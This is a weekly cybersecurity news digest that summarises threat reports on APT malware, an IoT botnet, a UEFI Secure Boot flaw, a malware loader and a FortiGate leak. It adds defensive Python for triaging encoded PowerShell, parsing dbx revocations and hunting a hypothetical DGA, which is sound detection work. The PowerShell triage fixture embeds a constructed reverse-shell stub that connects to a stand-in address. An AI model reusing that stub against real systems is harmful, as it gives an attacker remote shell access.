Cybersecurity Wiretap #39: From Android APT Operations to UEFI Exploits with a Focus on Multi-Platform Attacks (week of 01/13/2025)

Welcome to the weekly digest about the Cybersecurity & Threats in the wild. Below you will find a very subjective summary of Cybersecurity events for the prior week.

1. ANDROID MALWARE IN DONOT APT OPERATIONS by @CyfirmaR

  • Indian APT that serves Indian national interests
  • designed for intelligence gathering against internal threats
  • abuses a legitimate customer engagement platform for malicious purposes

https://www.cyfirma.com/research/android-malware-in-donot-apt-operations/

2. IoT Botnet Linked to Large-scale DDoS Attacks Since the End of 2024 by @TrendMicro

  • since the end of 2024, large-scale DDoS attacks have been targeting companies in Japan, issued from the command-and-control (C&C) servers of an IoT botnet that has been attacking various countries globally
  • botnet comprises malware variants derived from Mirai & Bashlite and infects IoT devices by exploiting vulns and weak creds
  • commands include those that can incorporate various DDoS attack methods, update malware, and enable proxy services
  • primary devices used in the botnet were wireless routers and IP cameras from well-known brands

https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html

3. Investigating A Web Shell Intrusion With Trend Micro™ Managed XDR by @TrendMicro

  • endpoint sensors detected the Internet Information Services (IIS) worker process (w3wp.exe) performing suspicious activity
  • the attacker was able to upload a web shell to the IIS server, whose upload functionality was unrestricted at the time of the attack
  • the attacker used an encoded PowerShell command to create a reverse TCP shell that connected to an external IP address for command-and-control

https://www.trendmicro.com/en_us/research/25/a/investigating-a-web-shell-intrusion-with-trend-micro–managed-xd.html
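The chain above (IIS worker spawning an encoded PowerShell reverse shell) is exactly the pattern a process-creation detection should catch. The Python below is an added example, not code from the Trend Micro report: it decodes the -EncodedCommand argument out of constructed endpoint events and flags the w3wp.exe-to-shell parent/child relationship plus the TCPClient reverse-shell markers in the decoded script. The events, paths, the payload stub and the C2 address 203.0.113.10 (a documentation-range address) are all constructed.

```python
import base64
import re
import shlex
from typing import Optional

# Strings a TCP reverse shell written in PowerShell can hardly avoid.
REVERSE_SHELL_MARKERS = ("net.sockets.tcpclient", ".getstream(")


def encode_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed payload and events (not from the Trend Micro report).
# 203.0.113.10 is a documentation-range address standing in for the C2.
REVERSE_SHELL_STUB = (
    '$c=New-Object System.Net.Sockets.TCPClient("203.0.113.10",4444);'
    '$s=$c.GetStream();[byte[]]$b=0..65535|%{0}'
)

SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "child": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Enc "
                + encode_powershell(REVERSE_SHELL_STUB)},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "child": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "whoami /priv"'},
    {"parent": r"C:\Windows\explorer.exe",
     "child": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script when the command line carries -EncodedCommand.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc,
    -EncodedCommand, ...), so match prefixes rather than one spelling.
    """
    tokens = shlex.split(cmdline, posix=False)   # keep Windows backslashes intact
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in ("-", "/"):
            continue
        flag = tok[1:].lower()
        if flag and "encodedcommand".startswith(flag):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
            except ValueError:
                return None
            return raw.decode("utf-16-le", errors="replace")
    return None


def assess_event(event: dict) -> dict:
    """Score one process-creation event for web-shell follow-on activity."""
    findings = []
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    child = event["child"].lower().rsplit("\\", 1)[-1]
    # The IIS worker has no business launching an interactive shell.
    if parent == "w3wp.exe" and child in ("cmd.exe", "powershell.exe", "pwsh.exe"):
        findings.append("iis-worker-spawned-shell")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        findings.append("encoded-powershell")
        lowered = decoded.lower()
        if any(marker in lowered for marker in REVERSE_SHELL_MARKERS):
            findings.append("reverse-shell-markers")
        m = re.search(r'TCPClient\("([^"]+)",\s*(\d+)\)', decoded)
        if m:
            findings.append(f"c2={m.group(1)}:{m.group(2)}")
    return {"cmdline": event["cmdline"], "decoded": decoded, "findings": findings}


def triage(events: list) -> list:
    return [assess_event(e) for e in events]


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result["findings"], result["cmdline"][:70])
```

The parent/child rule fires on its own for the plain cmd.exe case, so an unrestricted upload followed by any shell out of w3wp.exe is caught even before the payload is decoded; the decoded script is kept in the result so an analyst can pull the C2 endpoint straight out of the alert.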

4. Under the cloak of UEFI Secure Boot: Introducing CVE-2024-7344 by @ESETresearch

  • vulnerability allows execution of untrusted code during system boot, enabling deployment of malicious UEFI bootkits
  • all UEFI systems with Microsoft third-party UEFI signing enabled are affected
  • issue was fixed by affected vendors and old, vulnerable binaries were revoked by Microsoft on Jan 14th, 2025

https://www.welivesecurity.com/en/eset-research/under-cloak-uefi-secure-boot-introducing-cve-2024-7344/
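Microsoft revokes a signed UEFI binary by adding its Authenticode hash to the Secure Boot forbidden-signature database (dbx), which is stored as a concatenation of EFI_SIGNATURE_LIST structures. The Python below is an added example, not ESET's or Microsoft's code: it parses that format and answers whether a given hash is present, which is the check for "did the January 14th revocation reach this machine". The hashes and the SignatureOwner GUID in the sample are constructed; the page does not list the revoked hashes for CVE-2024-7344, so take those from the vendor advisory, and hash real images with a tool that computes the Authenticode digest rather than a plain SHA-256 of the file.

```python
import hashlib
import struct
import uuid

# EFI_CERT_SHA256_GUID: tags lists whose entries are SHA-256 Authenticode hashes.
EFI_CERT_SHA256_GUID = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328")
# SignatureOwner for the constructed entries below; arbitrary, not a real owner GUID.
CONSTRUCTED_OWNER = uuid.UUID("11111111-2222-4333-8444-555555555555")

HEADER = struct.Struct("<III")   # SignatureListSize, SignatureHeaderSize, SignatureSize
HEADER_LEN = 16 + HEADER.size    # SignatureType GUID + the three uint32 fields


def build_sha256_list(hashes, owner=CONSTRUCTED_OWNER) -> bytes:
    """Serialise one EFI_SIGNATURE_LIST of SHA-256 entries.

    Layout: SignatureType GUID (EFI mixed-endian, hence bytes_le), three
    little-endian uint32s, an empty SignatureHeader, then EFI_SIGNATURE_DATA
    entries of SignatureOwner GUID (16 bytes) + SignatureData (32 bytes).
    """
    sig_size = 16 + 32
    body = b"".join(owner.bytes_le + h for h in hashes)
    return (EFI_CERT_SHA256_GUID.bytes_le
            + HEADER.pack(HEADER_LEN + len(body), 0, sig_size)
            + body)


def parse_signature_lists(blob: bytes):
    """Yield (SignatureType, SignatureOwner, SignatureData) for every entry in a
    concatenation of EFI_SIGNATURE_LISTs, the on-disk form of db/dbx."""
    off = 0
    while off < len(blob):
        if len(blob) - off < HEADER_LEN:
            raise ValueError("truncated EFI_SIGNATURE_LIST header")
        sig_type = uuid.UUID(bytes_le=blob[off:off + 16])
        list_size, hdr_size, sig_size = HEADER.unpack_from(blob, off + 16)
        end = off + list_size
        if end > len(blob) or list_size < HEADER_LEN + hdr_size or sig_size <= 16:
            raise ValueError("malformed EFI_SIGNATURE_LIST")
        pos = off + HEADER_LEN + hdr_size
        if (end - pos) % sig_size:
            raise ValueError("signature array is not a multiple of SignatureSize")
        while pos < end:
            owner = uuid.UUID(bytes_le=blob[pos:pos + 16])
            yield sig_type, owner, bytes(blob[pos + 16:pos + sig_size])
            pos += sig_size
        off = end


def revoked_sha256_hashes(dbx: bytes) -> set:
    return {data for sig_type, _, data in parse_signature_lists(dbx)
            if sig_type == EFI_CERT_SHA256_GUID}


def is_revoked(dbx: bytes, authenticode_sha256: bytes) -> bool:
    """True if the given PE Authenticode SHA-256 appears in dbx. This is not a
    SHA-256 of the raw file bytes: obtain it from a tool that implements the
    Authenticode digest, or from the vendor advisory."""
    return authenticode_sha256 in revoked_sha256_hashes(dbx)


def strip_efivars_attributes(raw: bytes) -> bytes:
    """Linux efivarfs prefixes each variable with 4 bytes of attributes, so the
    content of /sys/firmware/efi/efivars/dbx-d719b2cb-3d3a-4596-a3bc-dad00e67656f
    needs this before it is handed to parse_signature_lists()."""
    return raw[4:]


# Constructed sample: two revocation lists, three fake hashes in total.
REVOKED = [hashlib.sha256(f"constructed revoked image {i}".encode()).digest()
           for i in range(3)]
NOT_REVOKED = hashlib.sha256(b"constructed clean image").digest()
SAMPLE_DBX = build_sha256_list(REVOKED[:2]) + build_sha256_list(REVOKED[2:])

if __name__ == "__main__":
    print(len(revoked_sha256_hashes(SAMPLE_DBX)), "revoked hashes in sample dbx")
    print("revoked:", is_revoked(SAMPLE_DBX, REVOKED[0]))
```

The parser refuses truncated or inconsistent lists instead of silently stopping early, which matters here: a dbx that fails to parse is not evidence that a hash is absent.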

5. One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery With Graph Neural Networks by #PaloAlto’s #Unit42

  • using a network crawler that leverages relationships among domains, Unit 42 discovered network artifacts around known indicators and trained a graph neural network (GNN) to detect additional malicious domains

https://unit42.paloaltonetworks.com/graph-neural-networks

6. MintsLoader: StealC and BOINC Delivery by @esthreat

  • ongoing campaign involving MintsLoader delivering second-stage payloads such as StealC and the Berkeley Open Infrastructure for Network Computing (BOINC) client
  • PowerShell-based malware loader that has been seen delivered via spam emails carrying a link to Kongtuke/ClickFix pages or a JScript file
  • features a Domain Generation Algorithm (DGA) with a seed value based on the addition of the current day of the month and a constant, combined with anti-VM techniques to evade sandboxes and malware researchers

https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery
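A DGA whose seed is only "day of month + constant" has at most 31 distinct seeds, so once the generator is recovered a defender can pre-compute every domain it can ever produce in one sweep and match DNS logs against that table. The Python below is an added example with a hypothetical generator, not MintsLoader's actual DGA: the constant, TLD, label length, hashing scheme and the DNS log lines are all constructed, and only the seed shape follows what eSentire describes.

```python
import datetime as dt
import hashlib

# Hypothetical parameters (NOT MintsLoader's): only the seed shape,
# day-of-month plus a constant, follows the eSentire description.
CONSTANT = 0x5A17
TLD = ".top"
DOMAINS_PER_DAY = 3
LABEL_LEN = 12

SAMPLE_DAY = dt.date(2025, 1, 13)


def seed_for(day: dt.date) -> int:
    """The seed depends on nothing but the day of the month."""
    return day.day + CONSTANT


def generate(day: dt.date, n: int = DOMAINS_PER_DAY) -> list:
    """Deterministic domain list for one calendar day (hypothetical generator)."""
    seed = seed_for(day)
    domains = []
    for i in range(n):
        digest = hashlib.sha256(f"{seed}:{i}".encode()).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:LABEL_LEN])
        domains.append(label + TLD)
    return domains


def full_blocklist() -> dict:
    """Every domain the generator can ever produce, keyed domain -> day of month.

    Because the seed ignores month and year, 31 days cover the whole space,
    which is what makes this shape of DGA cheap to block once recovered.
    """
    table = {}
    for day_of_month in range(1, 32):
        for domain in generate(dt.date(2025, 1, day_of_month)):
            table[domain] = day_of_month
    return table


# Constructed DNS log lines (timestamp, client, query type, name); one hits the DGA.
SAMPLE_DNS_LOG = [
    "2025-01-13T10:02:11Z 10.0.0.5 query A www.example.com",
    "2025-01-13T10:02:14Z 10.0.0.5 query A " + generate(SAMPLE_DAY)[1],
    "2025-01-13T10:03:40Z 10.0.0.9 query A updates.example.net",
]


def hunt(log_lines, table=None) -> list:
    """Return (client, domain, day_of_month) for each query that falls inside
    the pre-computed DGA space."""
    table = table if table is not None else full_blocklist()
    hits = []
    for line in log_lines:
        _, client, _, _, qname = line.split()
        if qname.lower() in table:
            hits.append((client, qname, table[qname.lower()]))
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_DNS_LOG):
        print("DGA hit:", hit)
```

The day_of_month returned with each hit is a useful sanity check during hunting: a query for a domain from a different day than the log timestamp suggests either clock skew on the victim or a different constant than the one you recovered.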

7. Deep Dive Into a Linux Rootkit Malware by #FORTIGUARD LABS

  • follow-up analysis of how remote attackers exploited multiple vulnerabilities in an appliance to gain control of a customer’s system

https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware

8. Massive FortiGate Config Leak: Assessing the Impact by @censysio

  • a new hacker group leaked full Fortinet FortiGate firewall configs, including plaintext creds, for over 15k devices, from a compromise dating back to 2022
  • as of January 17, of the 15.4k distinct compromised hosts, over half are still online and reachable in scans, and 32.88% are still exposing their FortiGate web login interfaces

https://censys.com/fortigate-config-leak-impact

9. Lazarus APT: Techniques for Hunting Contagious Interview by @ValidinLLC

  • using the ClickFix social engineering technique to trick job seekers into copying and pasting malicious code onto their devices during fake video job interviews (“Contagious Interview”)
  • shows how to expand and pivot from threat intelligence using Validin to detect likely-related infrastructure and mitigate this threat

https://www.validin.com/blog/inoculating_contagious_interview_with_validin

Thank you for reading.

Please add interesting items you came across during the week in the comments below.
